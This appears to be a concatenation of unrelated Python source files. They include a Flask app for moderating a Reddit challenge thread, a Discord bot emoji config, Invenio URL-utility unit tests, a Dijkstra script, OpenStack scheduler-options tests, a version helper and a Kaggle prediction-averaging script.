(i.e. marked as requiring a redraw). Use `Refresh` first if you want to immediately redraw the window unconditionally. .. versionadded:: 0.9.5 """ self._infoFrame.Update()
#This is a cell with a custom comment as marker x=10 y=11 print(x+y)
#!/usr/bin/python # TODO: issues with new oauth2 stuff. Keep using older version of Python for now. # #!/usr/bin/env python import subprocess import praw import datetime import pyperclip from hashlib import sha1 from flask import Flask from flask import Response from flask import request from cStringIO import StringIO from base64 import b64encode from base64 import b64decode from ConfigParser import ConfigParser import OAuth2Util import os import markdown import bleach # encoding=utf8 import sys from participantCollection import ParticipantCollection reload(sys) sys.setdefaultencoding('utf8') # Edit Me! challengePageSubmissionId = '68lss2' flaskport = 8891 thisMonthName = "May" nextMonthName = "June" readAllCommentsWhichCanBeSlower = False sorryTooLateToSignUpReplyText = "Sorry, but the late signup grace period for " + thisMonthName + " is over, so you can't officially join this challenge. But feel free to follow along anyway, and comment all you want. And be sure to join us for the " + nextMonthName + " challenge. Signup posts for " + nextMonthName + " will begin during the last week of " + thisMonthName + "." reinstatedReplyText = "OK, I've reinstated you. You should start showing up on the list again starting tomorrow." app = Flask(__name__) app.debug = True commentHashesAndComments = {} submission = None def loginAndReturnRedditSession(): config = ConfigParser() config.read("../reddit-password-credentials.cfg") user = config.get("Reddit", "user") password = config.get("Reddit", "password") # TODO: password auth is going away, and we will soon need to do oauth. redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg') redditSession.login(user, password, disable_warning=True) # submissions = redditSession.get_subreddit('pornfree').get_hot(limit=5) # print [str(x) for x in submissions] return redditSession def loginOAuthAndReturnRedditSession(): redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg') o = OAuth2Util.OAuth2Util(redditSession, print_log=True, configfile="../reddit-oauth-credentials.cfg") # TODO: Testing comment of refresh. We authenticate fresh every time, so presumably no need to do o.refresh(). # o.refresh(force=True) return redditSession def getSubmissionForRedditSession(redditSession): submission = redditSession.get_submission(submission_id=challengePageSubmissionId) if readAllCommentsWhichCanBeSlower: submission.replace_more_comments(limit=None, threshold=0) return submission def getCommentsForSubmission(submission): return [comment for comment in praw.helpers.flatten_tree(submission.comments) if comment.__class__ == praw.objects.Comment] def retireCommentHash(commentHash): with open("retiredcommenthashes.txt", "a") as commentHashFile: commentHashFile.write(commentHash + '\n') def retiredCommentHashes(): with open("retiredcommenthashes.txt", "r") as commentHashFile: # return commentHashFile.readlines() return commentHashFile.read().splitlines() @app.route('/moderatechallenge.html') def moderatechallenge(): currentDayOfMonthIndex = datetime.date.today().day lateCheckinGracePeriodIsInEffect = currentDayOfMonthIndex <= 3 global commentHashesAndComments global submission commentHashesAndComments = {} stringio = StringIO() stringio.write('<html>\n<head>\n</head>\n\n') # redditSession = loginAndReturnRedditSession() redditSession = loginOAuthAndReturnRedditSession() submission = getSubmissionForRedditSession(redditSession) flat_comments = getCommentsForSubmission(submission) retiredHashes = retiredCommentHashes() i = 1 stringio.write('<iframe name="invisibleiframe" style="display:none;"></iframe>\n') stringio.write("<h3>") stringio.write(os.getcwd()) stringio.write("<br>\n") stringio.write(submission.title) stringio.write("</h3>\n\n") stringio.write('<form action="copydisplaytoclipboard.html" method="post" target="invisibleiframe">') stringio.write('<input type="submit" name="actiontotake" value="Copy display.py stdout to clipboard">') stringio.write('<input type="submit" name="actiontotake" value="Automatically post display.py stdout">') stringio.write('</form>') stringio.write('<form action="updategooglechart.html" method="post" target="invisibleiframe">') stringio.write('<input type="submit" value="update-google-chart.py">') stringio.write('</form>') for comment in flat_comments: # print comment.is_root # print comment.score i += 1 commentHash = sha1() commentHash.update(comment.permalink) commentHash.update(comment.body.encode('utf-8')) commentHash = commentHash.hexdigest() if commentHash not in retiredHashes: commentHashesAndComments[commentHash] = comment authorName = str(comment.author) # can be None if author was deleted. So check for that and skip if it's None. participant = ParticipantCollection().participantNamed(authorName) stringio.write("<hr>\n") stringio.write('<font color="blue"><b>') stringio.write(authorName) stringio.write('</b></font><br>') if ParticipantCollection().hasParticipantNamed(authorName): stringio.write(' <small><font color="green">(member)</font></small>') if participant.isStillIn: stringio.write(' <small><font color="green">(still in)</font></small>') else: stringio.write(' <small><font color="red">(out)</font></small>') if participant.hasCheckedIn: stringio.write(' <small><font color="green">(checked in)</font></small>') else: stringio.write(' <small><font color="orange">(not checked in)</font></small>') if participant.hasRelapsed: stringio.write(' <small><font color="red">(relapsed)</font></small>') else: stringio.write(' <small><font color="green">(not relapsed)</font></small>') else: stringio.write(' <small><font color="red">(not a member)</font></small>') stringio.write('<form action="takeaction.html" method="post" target="invisibleiframe">') if lateCheckinGracePeriodIsInEffect: stringio.write('<input type="submit" name="actiontotake" value="Checkin">') stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin" style="color:white;background-color:green">') else: stringio.write('<input type="submit" name="actiontotake" value="Checkin" style="color:white;background-color:green">') stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin">') stringio.write('<input type="submit" name="actiontotake" value="Relapse" style="color:white;background-color:red">') stringio.write('<input type="submit" name="actiontotake" value="Reinstate with automatic comment">') stringio.write('<input type="submit" name="actiontotake" value="Reply with sorry-too-late comment">') stringio.write('<input type="submit" name="actiontotake" value="Skip comment">') stringio.write('<input type="submit" name="actiontotake" value="Skip comment and don\'t upvote">') stringio.write('<input type="hidden" name="username" value="' + b64encode(authorName) + '">') stringio.write('<input type="hidden" name="commenthash" value="' + commentHash + '">') stringio.write('<input type="hidden" name="commentpermalink" value="' + comment.permalink + '">') stringio.write('</form>') stringio.write(bleach.clean(markdown.markdown(comment.body.encode('utf-8')), tags=['p'])) stringio.write("\n<br><br>\n\n") stringio.write('</html>') pageString = stringio.getvalue() stringio.close() return Response(pageString, mimetype='text/html') @app.route('/takeaction.html', methods=["POST"]) def takeaction(): username = b64decode(request.form["username"]) commentHash = str(request.form["commenthash"]) # commentPermalink = request.form["commentpermalink"] actionToTake = request.form["actiontotake"] # print commentHashesAndComments comment = commentHashesAndComments[commentHash] # print "comment: " + str(comment) if actionToTake == 'Checkin': print "checkin - " + username subprocess.call(['./checkin.py', username]) comment.upvote() retireCommentHash(commentHash) if actionToTake == 'Signup and checkin': print "signup and checkin - " + username subprocess.call(['./signup-and-checkin.sh', username]) comment.upvote() retireCommentHash(commentHash) elif actionToTake == 'Relapse': print "relapse - " + username subprocess.call(['./relapse.py', username]) comment.upvote() retireCommentHash(commentHash) elif actionToTake == 'Reinstate with automatic comment': print "reinstate - " + username subprocess.call(['./reinstate.py', username]) comment.reply(reinstatedReplyText) comment.upvote() retireCommentHash(commentHash) elif actionToTake == 'Reply with sorry-too-late comment': print "reply with sorry-too-late comment - " + username comment.reply(sorryTooLateToSignUpReplyText) comment.upvote() retireCommentHash(commentHash) elif actionToTake == 'Skip comment': print "Skip comment - " + username comment.upvote() retireCommentHash(commentHash) elif actionToTake == "Skip comment and don't upvote": print "Skip comment and don't upvote - " + username retireCommentHash(commentHash) return Response("hello", mimetype='text/html') @app.route('/copydisplaytoclipboard.html', methods=["POST"]) def copydisplaytoclipboard(): actionToTake = request.form["actiontotake"] if actionToTake == 'Copy display.py stdout to clipboard': subprocess.call(['./display.py']) if actionToTake == 'Automatically post display.py stdout': subprocess.call(['./display.py']) submissionText = pyperclip.paste() submission.edit(submissionText) return Response("hello", mimetype='text/html') @app.route('/updategooglechart.html', methods=["POST"]) def updategooglechart(): print "TODO: Copy display to clipboard" subprocess.call(['./update-google-chart.py']) return Response("hello", mimetype='text/html') if __name__ == '__main__': app.run(host='', port=flaskport)
"""Config file for the emojis that Chiaki will use. RENAME THIS FILE TO emojis.py OTHERWISE IT WON'T WORK. By default it uses the unicode emojis. However, you can specify server emojis in one of the two possible ways: 1. The raw string of the emoji. This is the format <:name:id>. You can find this by placing a backslash before the emoji. 2. The ID of the emoji. This must be an integer. And can be shown through the same method. Note that bots have "nitro" status when it comes to emojis. So as long as it's in the server that has the custom emoji, the bot can use it on any other server it's in. """ # ------- Confirmation emojis (for Context.ask_confirmation) ------- # Confirm option confirm = '\N{WHITE HEAVY CHECK MARK}' # Deny Option deny = '\N{CROSS MARK}' # ------- Status emojis (for various info commands) ---------------- online = '\N{GREEN HEART}' idle = '\N{YELLOW HEART}' dnd = '\N{HEAVY BLACK HEART}' offline = '\N{BLACK HEART}' streaming = '\N{PURPLE HEART}' bot_tag = '\N{ROBOT FACE}' # ------- Currency Emoji ------------- money = '\N{BANKNOTE WITH DOLLAR SIGN}' # ------ Numbers ----- # Right now it uses the default key-caps # However, you may specify custom emojis if needed # # Note: The numbers are what *Discord sees them as*. Technically the # actual keycap number emoji would be {number}\ufe0f\u20e3. But discord # instead sends it as {number}\u20e3 (without the \ufe0f). Do not add the # \fe0f in, otherwise it won't send as an actual number. numbers = [ f'{n}\u20e3' for n in range(10) ] # ------- Minesweeper ------- # Not an emoji per se but set to True if you want to be able to use external # emojis for Minesweeper. This only applies to Minesweeper as this changes # the control scheme if she's able to use external emojis. # # Note that if Chiaki doesn't have Use External Emojis she'll be forced to # use the default control scheme by default. msw_use_external_emojis = False msw_y_row = [ # Should have emojis representing 1-17. # If you set msw_use_external_emojis to True this *must* be filled. ] msw_letters = [ # Should have emojis representing A-Q or some equivalent. # If you set msw_use_external_emojis to True this *must* be filled. ] # ------ Connect-Four ------- c4_winning_tiles = [ '\N{HEAVY BLACK HEART}', '\N{BLUE HEART}' ] # ------- Sudoku ------ sudoku_clues = [ f'{n}\u20e3' for n in range(1, 9) ] # ------- Checkers ------- checkers_black_king = '\N{HEAVY BLACK HEART}' checkers_white_king = '\N{BLUE HEART}' checkers_black_last_move = '' checkers_white_last_move = '' # -------- Shards --------- shard_connecting = '' shard_online = '' shard_disconnecting = '' shard_offline = ''
# -*- coding: utf-8 -*- ## ## This file is part of Invenio. ## Copyright (C) 2009, 2010, 2011 CERN. ## ## Invenio is free software; you can redistribute it and/or ## modify it under the terms of the GNU General Public License as ## published by the Free Software Foundation; either version 2 of the ## License, or (at your option) any later version. ## ## Invenio is distributed in the hope that it will be useful, but ## WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with Invenio; if not, write to the Free Software Foundation, Inc., ## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """Unit tests for the urlutils library.""" __revision__ = "$Id$" from invenio.testutils import InvenioTestCase from cgi import parse_qs from invenio.config import CFG_SITE_URL from invenio.testutils import make_test_suite, run_test_suite from invenio.urlutils import (create_AWS_request_url, string_to_numeric_char_reference, make_canonical_urlargd, create_html_link, create_html_mailto, same_urls_p, HASHLIB_IMPORTED, wash_url_argument, create_url, create_Indico_request_url, get_relative_url) class TestWashUrlArgument(InvenioTestCase): def test_wash_url_argument(self): """urlutils - washing of URL arguments""" self.assertEqual(1, wash_url_argument(['1'], 'int')) self.assertEqual("1", wash_url_argument(['1'], 'str')) self.assertEqual(['1'], wash_url_argument(['1'], 'list')) self.assertEqual(0, wash_url_argument('ellis', 'int')) self.assertEqual("ellis", wash_url_argument('ellis', 'str')) self.assertEqual(["ellis"], wash_url_argument('ellis', 'list')) self.assertEqual(0, wash_url_argument(['ellis'], 'int')) self.assertEqual("ellis", wash_url_argument(['ellis'], 'str')) self.assertEqual(["ellis"], wash_url_argument(['ellis'], 'list')) class TestUrls(InvenioTestCase): """Tests on URLs""" def test_url_creation(self): """urlutils - test url creation""" self.assertEqual(create_url('http://www.a.com/search', {'recid':3, 'of':'hb&'}, escape_urlargd=True), 'http://www.a.com/search?of=hb%26&amp;recid=3') self.assertEqual(create_url('http://www.a.com/search', {'recid':3, 'of':'hb&'}, escape_urlargd=False), 'http://www.a.com/search?of=hb&&amp;recid=3') def test_canonical_urlargd_creation(self): """urlutils - test creation of canonical URLs""" self.assertEqual(make_canonical_urlargd({'a' : 1, 'b' : '2', 'b&': '2=', ':' : '?&'}, {'a': ('int', 1), 'b': ('str', 2)}), "?b%26=2%3D&amp;%3A=%3F%26&amp;b=2") if HASHLIB_IMPORTED: def test_signed_aws_request_creation(self): """urlutils - test creation of signed AWS requests""" signed_aws_request_url = create_AWS_request_url("http://webservices.amazon.com/onca/xml", {'AWSAccessKeyId': '00000000000000000000', 'Service': 'AWSECommerceService', 'Operation': 'ItemLookup', 'ItemId': '0679722769', 'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews', 'Version': '2009-01-06'}, "1234567890", _timestamp="2009-01-01T12:00:00Z") # Are we at least acccessing correct base url? self.assert_(signed_aws_request_url.startswith("http://webservices.amazon.com/onca/xml")) # Check that parameters with special characters (, :) get correctly # encoded/decoded ## Note: using parse_qs() url-decodes the string self.assertEqual(parse_qs(signed_aws_request_url)["ResponseGroup"], ['ItemAttributes,Offers,Images,Reviews']) self.assert_('ItemAttributes%2COffers%2CImages%2CReviews' \ in signed_aws_request_url) self.assertEqual(parse_qs(signed_aws_request_url)["Timestamp"], ['2009-01-01T12:00:00Z']) # Check signature exists and is correct self.assertEqual(parse_qs(signed_aws_request_url)["Signature"], ['Nace+U3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg=']) self.assert_('Nace%2BU3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg%3D&Operation' \ in signed_aws_request_url) # Continute with an additional request signed_aws_request_url_2 = \ create_AWS_request_url("http://ecs.amazonaws.co.uk/onca/xml", {'AWSAccessKeyId': '00000000000000000000', 'Actor': 'Johnny Depp', 'AssociateTag': 'mytag-20', 'Operation': 'ItemSearch', 'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews,Variations', 'SearchIndex': 'DVD', 'Service': 'AWSECommerceService', 'Sort': 'salesrank', 'Version': '2009-01-01'}, "1234567890", _timestamp="2009-01-01T12:00:00Z") # Check signature exists and is correct self.assertEqual(parse_qs(signed_aws_request_url_2)["Signature"], ['TuM6E5L9u/uNqOX09ET03BXVmHLVFfJIna5cxXuHxiU=']) def test_signed_Indico_request_creation(self): """urlutils - test creation of signed Indico requests""" signed_Indico_request_url = create_Indico_request_url("https://indico.cern.ch", "categ", "", [1, 7], "xml", {'onlypublic': 'yes', 'order': 'title', 'from': 'today', 'to': 'tomorrow'}, '00000000-0000-0000-0000-000000000000', '00000000-0000-0000-0000-000000000000', _timestamp=1234) # Are we at least acccessing correct base url? self.assert_(signed_Indico_request_url.startswith("https://indico.cern.ch/export/categ/1-7.xml?")) # Check parameters self.assertEqual(parse_qs(signed_Indico_request_url)["order"], ['title']) self.assertEqual(parse_qs(signed_Indico_request_url)["timestamp"], ['1234']) # Check signature exists and is correct self.assertEqual(parse_qs(signed_Indico_request_url)["signature"], ['e984e0c683e36ce3544372f23a397fd2400f4954']) def test_same_urls_p(self): """urlutils - test checking URLs equality""" self.assertEqual(same_urls_p(CFG_SITE_URL + '?a=b&c=d&e=f', CFG_SITE_URL + '?e=f&c=d&a=b'), True) self.assertEqual(same_urls_p(CFG_SITE_URL + '?a=b&c=d&e=f&ln=fr', CFG_SITE_URL + '?e=f&c=d&a=b&ln=en'), False) class TestHtmlLinks(InvenioTestCase): """Tests on HTML links""" def test_html_link_creation(self): """urlutils - test creation of HTML links""" # Check with various encoding and escaping traps self.assertEqual(create_html_link('http://www.a.com', {'a' : 1, 'b' : '2', 'b&': '2=', ':' : '?'}, 'my label > & better than yours', {'style': 'color:#f00', 'target': "_blank"}), '<a href="http://www.a.com?a=1&amp;%3A=%3F&amp;b%26=2%3D&amp;b=2" style="color:#f00" target="_blank">my label > & better than yours</a>') def test_html_link_creation_no_argument_escaping(self): """urlutils - test creation of HTML links, without arguments escaping""" self.assertEqual(create_html_link('http://www.a.com', {'a' : 1, 'b' : '2', 'b&': '2=', ':' : '?'}, 'my label > & better than yours', {'style': 'color:#f00', 'target': "_blank"}, escape_urlargd=False), '<a href="http://www.a.com?a=1&amp;:=?&amp;b&=2=&amp;b=2" style="color:#f00" target="_blank">my label > & better than yours</a>') def test_html_link_creation_no_attribute_escaping(self): """urlutils - test creation of HTML links, without attributes escaping""" self.assertEqual(create_html_link('http://www.a.com', {'a' : 1, 'b' : '2', 'b&': '2=', ':' : '?'}, 'my label > & better than yours', {'style': 'color:#f00', 'target': "_blank"}, escape_linkattrd=False), '<a href="http://www.a.com?a=1&amp;%3A=%3F&amp;b%26=2%3D&amp;b=2" style="color:#f00" target="_blank">my label > & better than yours</a>') def test_string_to_numeric_char_reference(self): """urlutils - test numeric character conversion from string""" self.assertEqual(string_to_numeric_char_reference('abc123'), "&#97;&#98;&#99;&#49;&#50;&#51;") self.assertEqual(string_to_numeric_char_reference('\/&;,#$%~é'), "&#92;&#47;&#38;&#59;&#44;&#35;&#36;&#37;&#126;&#195;&#169;") class TestEmailObfuscationMode(InvenioTestCase): """Tests on HTML mailto links creation and obfuscation modes""" def test_html_mailto_obfuscation_mode_minus1(self): """urlutils - test creation of HTML "mailto" links, obfuscation mode -1""" self.assertEqual(create_html_mailto('[email protected]', subject='Hey there', body='Lunch at 8pm?\ncu!', bcc='[email protected]', link_label="Date creator", linkattrd={'style': 'text-decoration: blink'}, email_obfuscation_mode=-1), '') def test_html_mailto_obfuscation_mode_0(self): """urlutils - test creation of HTML "mailto" links, obfuscation mode 0""" self.assertEqual(create_html_mailto('[email protected]', subject='Hey there', body='Lunch at 8pm?\ncu!', bcc='[email protected]', link_label="Date creator", linkattrd={'style': 'text-decoration: blink'}, email_obfuscation_mode=0), '<a href="mailto:[email protected]?body=Lunch%20at%208pm%3F%0D%0Acu%21&amp;bcc=romeo%40cds.cern.ch&amp;subject=Hey%20there" style="text-decoration: blink">Date creator</a>') def test_html_mailto_obfuscation_mode_1(self): """urlutils - test creation of HTML "mailto" links, obfuscation mode 1""" self.assertEqual(create_html_mailto('[email protected]', subject='Hey there', body='Lunch at 8pm?\ncu!', bcc='[email protected]', link_label="Date creator", linkattrd={'style': 'text-decoration: blink'}, email_obfuscation_mode=1), '<a href="mailto:juliet [at] cds [dot] cern [dot] ch?body=Lunch%20at%208pm%3F%0D%0Acu%21&amp;bcc=romeo%40cds.cern.ch&amp;subject=Hey%20there" style="text-decoration: blink">Date creator</a>') def test_html_mailto_obfuscation_mode_2(self): """urlutils - test creation of HTML "mailto" links, obfuscation mode 2""" self.assertEqual(create_html_mailto('[email protected]', subject='Hey there', body='Lunch at 8pm?\ncu!', bcc='[email protected]', link_label="Date creator", linkattrd={'style': 'text-decoration: blink'}, email_obfuscation_mode=2), '<a href="mailto:&#106;&#117;&#108;&#105;&#101;&#116;&#64;&#99;&#100;&#115;&#46;&#99;&#101;&#114;&#110;&#46;&#99;&#104;?body=Lunch%20at%208pm%3F%0D%0Acu%21&amp;bcc=romeo%40cds.cern.ch&amp;subject=Hey%20there" style="text-decoration: blink">Date creator</a>') def test_html_mailto_obfuscation_mode_3(self): """urlutils - test creation of HTML "mailto" links, obfuscation mode 3""" self.assertEqual(create_html_mailto('[email protected]', subject='Hey there', body='Lunch at 8pm?\ncu!', bcc='[email protected]', link_label="Date creator", linkattrd={'style': 'text-decoration: blink'}, email_obfuscation_mode=3), '<script language="JavaScript" type="text/javascript">document.write(\'>a/<rotaerc etaD>"knilb :noitaroced-txet"=elyts "ereht02%yeH=tcejbus;pma&hc.nrec.sdc04%oemor=ccb;pma&12%ucA0%D0%F3%mp802%ta02%hcnuL=ydob?hc.nrec.sdc@teiluj:otliam"=ferh a<\'.split("").reverse().join(""))</script>') def test_html_mailto_obfuscation_mode_4(self): """urlutils - test creation of HTML "mailto" links, obfuscation mode 4""" self.assertEqual(create_html_mailto('[email protected]', subject='Hey there', body='Lunch at 8pm?\ncu!', bcc='[email protected]', link_label="Date creator", linkattrd={'style': 'text-decoration: blink'}, email_obfuscation_mode=4), 'juliet<img src="%(CFG_SITE_URL)s/img/at.gif" alt=" [at] " style="vertical-align:baseline" />cds<img src="%(CFG_SITE_URL)s/img/dot.gif" alt=" [dot] " style="vertical-align:bottom" />cern<img src="%(CFG_SITE_URL)s/img/dot.gif" alt=" [dot] " style="vertical-align:bottom" />ch' % \ {'CFG_SITE_URL': CFG_SITE_URL}) class TestRelativeURL(InvenioTestCase): """Tests the get_relative_url function with different input strings""" def test_relative_url(self): """urlutils - test get_relative_url""" url_normal = "http://web.net" self.assertEqual("", get_relative_url(url_normal)) url_normal_trailing = "http://web.net/" self.assertEqual("", get_relative_url(url_normal_trailing)) url_more = "http://web.net/asd" self.assertEqual("/asd", get_relative_url(url_more)) url_more_trailing = "http://web.net/asd/" self.assertEqual("/asd", get_relative_url(url_more_trailing)) url_adv = "http://web.net/asd/qwe" self.assertEqual("/asd/qwe", get_relative_url(url_adv)) url_adv_trailing = "http://web.net/asd/qwe/" self.assertEqual("/asd/qwe", get_relative_url(url_adv_trailing)) TEST_SUITE = make_test_suite(TestWashUrlArgument, TestUrls, TestHtmlLinks, TestEmailObfuscationMode, TestRelativeURL) if __name__ == "__main__": run_test_suite(TEST_SUITE)
# -*- coding: utf-8 -*- """ Created on Tue Nov 17 19:41:46 2015 @author: deep """ from graph import weightedGraph import heapq def djikstra(a,S): N = len(a.adjLst) Visited = [False for i in xrange(N)] Distance = [float('inf') for i in xrange(N)] Distance[S] = 0 heap = [] heapq.heappush(heap,(0,S)) for i in xrange(N): if heap: while(True): _,u = heapq.heappop(heap) if not Visited[u]: break Visited[u] = True for weight_uv,v in a.adjLst[u]: if not Visited[v]: if Distance[v] > Distance[u] + weight_uv: Distance[v] = Distance[u] + weight_uv heapq.heappush(heap, (Distance[v],v)) print Distance return Distance g = weightedGraph(4) g.addEdge(0,1,1) g.addEdge(1,2,2) g.addEdge(2,3,3) g.addEdge(3,0,4) djikstra(g,0)
# Copyright 2011 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Tests For PickledScheduler. """ import datetime import StringIO from nova.openstack.common import jsonutils from nova.scheduler import scheduler_options from nova import test class FakeSchedulerOptions(scheduler_options.SchedulerOptions): def __init__(self, last_checked, now, file_old, file_now, data, filedata): super(FakeSchedulerOptions, self).__init__() # Change internals ... self.last_modified = file_old self.last_checked = last_checked self.data = data # For overrides ... self._time_now = now self._file_now = file_now self._file_data = filedata self.file_was_loaded = False def _get_file_timestamp(self, filename): return self._file_now def _get_file_handle(self, filename): self.file_was_loaded = True return StringIO.StringIO(self._file_data) def _get_time_now(self): return self._time_now class SchedulerOptionsTestCase(test.NoDBTestCase): def test_get_configuration_first_time_no_flag(self): last_checked = None now = datetime.datetime(2012, 1, 1, 1, 1, 1) file_old = None file_now = datetime.datetime(2012, 1, 1, 1, 1, 1) data = dict(a=1, b=2, c=3) jdata = jsonutils.dumps(data) fake = FakeSchedulerOptions(last_checked, now, file_old, file_now, {}, jdata) self.assertEquals({}, fake.get_configuration()) self.assertFalse(fake.file_was_loaded) def test_get_configuration_first_time_empty_file(self): last_checked = None now = datetime.datetime(2012, 1, 1, 1, 1, 1) file_old = None file_now = datetime.datetime(2012, 1, 1, 1, 1, 1) jdata = "" fake = FakeSchedulerOptions(last_checked, now, file_old, file_now, {}, jdata) self.assertEquals({}, fake.get_configuration('foo.json')) self.assertTrue(fake.file_was_loaded) def test_get_configuration_first_time_happy_day(self): last_checked = None now = datetime.datetime(2012, 1, 1, 1, 1, 1) file_old = None file_now = datetime.datetime(2012, 1, 1, 1, 1, 1) data = dict(a=1, b=2, c=3) jdata = jsonutils.dumps(data) fake = FakeSchedulerOptions(last_checked, now, file_old, file_now, {}, jdata) self.assertEquals(data, fake.get_configuration('foo.json')) self.assertTrue(fake.file_was_loaded) def test_get_configuration_second_time_no_change(self): last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1) now = datetime.datetime(2012, 1, 1, 1, 1, 1) file_old = datetime.datetime(2012, 1, 1, 1, 1, 1) file_now = datetime.datetime(2012, 1, 1, 1, 1, 1) data = dict(a=1, b=2, c=3) jdata = jsonutils.dumps(data) fake = FakeSchedulerOptions(last_checked, now, file_old, file_now, data, jdata) self.assertEquals(data, fake.get_configuration('foo.json')) self.assertFalse(fake.file_was_loaded) def test_get_configuration_second_time_too_fast(self): last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1) now = datetime.datetime(2011, 1, 1, 1, 1, 2) file_old = datetime.datetime(2012, 1, 1, 1, 1, 1) file_now = datetime.datetime(2013, 1, 1, 1, 1, 1) old_data = dict(a=1, b=2, c=3) data = dict(a=11, b=12, c=13) jdata = jsonutils.dumps(data) fake = FakeSchedulerOptions(last_checked, now, file_old, file_now, old_data, jdata) self.assertEquals(old_data, fake.get_configuration('foo.json')) self.assertFalse(fake.file_was_loaded) def test_get_configuration_second_time_change(self): last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1) now = datetime.datetime(2012, 1, 1, 1, 1, 1) file_old = datetime.datetime(2012, 1, 1, 1, 1, 1) file_now = datetime.datetime(2013, 1, 1, 1, 1, 1) old_data = dict(a=1, b=2, c=3) data = dict(a=11, b=12, c=13) jdata = jsonutils.dumps(data) fake = FakeSchedulerOptions(last_checked, now, file_old, file_now, old_data, jdata) self.assertEquals(data, fake.get_configuration('foo.json')) self.assertTrue(fake.file_was_loaded)
""" Init """ from __future__ import unicode_literals import datetime import os import subprocess VERSION = (2, 2, 13, 'final', 0) def get_version(version=None): """ Returns a PEP 386-compliant version number from VERSION. """ if not version: version = VERSION else: assert len(version) == 5 assert version[3] in ('alpha', 'beta', 'rc', 'final') # Now build the two parts of the version number: # main = X.Y[.Z] # sub = .devN - for pre-alpha releases # | {a|b|c}N - for alpha, beta and rc releases parts = 2 if version[2] == 0 else 3 main = '.'.join(str(x) for x in version[:parts]) sub = '' if version[3] == 'alpha' and version[4] == 0: git_changeset = get_git_changeset() if git_changeset: sub = '.dev%s' % git_changeset elif version[3] != 'final': mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'} sub = mapping[version[3]] + str(version[4]) return str(main + sub) def get_git_changeset(): """ Returns a numeric identifier of the latest git changeset. The result is the UTC timestamp of the changeset in YYYYMMDDHHMMSS format. This value isn't guaranteed to be unique, but collisions are very unlikely, so it's sufficient for generating the development version numbers. """ repo_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) git_log = subprocess.Popen('git log --pretty=format:%ct --quiet -1 HEAD', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, cwd=repo_dir, universal_newlines=True) timestamp = git_log.communicate()[0] try: timestamp = datetime.datetime.utcfromtimestamp(int(timestamp)) except ValueError: return None return timestamp.strftime('%Y%m%d%H%M%S')
# -*- coding: utf-8 -*- import pandas as pd from itertools import izip import numpy as np import glob from facebook import FacebookCompetition print('Loading test data') bids = pd.read_csv(FacebookCompetition.__data__['bids']) test = pd.read_csv(FacebookCompetition.__data__['test']) te = pd.merge(test, bids, how='left') del bids files = glob.glob('data/facebook.te.*.txt.gz') its = [iter(pd.read_table(f, header=-1, iterator=True, chunksize=2**15, compression='gzip')) for f in files] #with open('data/facebook_softmax_20150506.csv', 'w') as out: c = [] for i,chunks in enumerate(izip(*its)): print(i) A = np.array([np.c_[chunk.values,1-chunk.values] for chunk in chunks]) A = np.exp(np.log(A).mean(axis=0)) A /= A.sum(axis=1)[:, np.newaxis] A = A[:,0] df = pd.DataFrame(A) df.index = chunks[0].index df.columns = chunks[0].columns c.append(df) df = pd.concat(c) df.index = te.bidder_id df = df.groupby(level=0).mean() df.columns = ['prediction'] df.to_csv('data/facebook.te.20150509_1.csv', index_label='bidder_id')